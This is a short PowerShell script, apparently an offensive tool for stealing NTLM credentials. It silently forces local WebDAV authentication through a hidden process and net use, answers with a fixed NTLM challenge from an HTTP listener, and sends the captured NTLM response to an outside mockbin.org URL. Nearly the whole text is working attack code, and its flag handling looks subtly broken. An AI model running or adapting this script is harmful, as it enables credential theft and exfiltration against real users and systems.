Original sending to Mockbin (use a new mockbin)
[byte[]]$NTLMType2 =
@(
0x4e,0x54,0x4c,0x4d,
0x53,0x53,0x50,0x00,
0x02,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,
0x00,0x28,0x00,0x00,
0x01,0x82,0x00,0x00,
0x11,0x22,0x33,0x44,
0x55,0x66,0x77,0x88,
0x00,0x00,0x00,0x00
)
start-process powershell.exe -WindowStyle hidden {
for ($var = 1; $var -le 10; $var++) {
net use f: \\localhost@8080\c$
dir \\localhost@8080\fg
}
}
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://localhost:8080/')
$listener.Start()
Write-Output 'Listening...'
$ntlmt2 = $false
while ($true) {
$context = $listener.GetContext()
$request = $context.Request
$response = $context.Response
$hostip = $request.RemoteEndPoint
$headers = $request.Headers
$message = ''
foreach ($key in $headers.AllKeys) {
if ($key -match 'Authorization') {
[string[]]$values = $headers.GetValues('Authorization')
$NTLMAuthentication = $values[0] -split '\s+'
$NTLMType = $NTLMAuthentication[1]
if ($ntlmt2) {
Write-Output $context.Request.RemoteEndPoint.Address.IPAddressToString
Write-Output $NTLMType
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
(New-Object System.Net.WebClient).DownloadString('https://mockbin.org/bin/<EnterNewURLHERE>/' + $NTLMType)
$ntlmt2 = $true
}
$NTLMType2Response = 'NTLM ' + [Convert]::ToBase64String($NTLMType2)
$response.AddHeader('WWW-Authenticate', $NTLMType2Response)
$response.AddHeader('Content-Type','text/html')
$response.StatusCode = 401
[byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message)
$response.ContentLength64 = $buffer.length
$output = $response.OutputStream
$output.Write($buffer, 0, $buffer.length)
$output.Close()
continue
} else {
$response.AddHeader('WWW-Authenticate', 'NTLM')
}
}
}
$listener.Stop()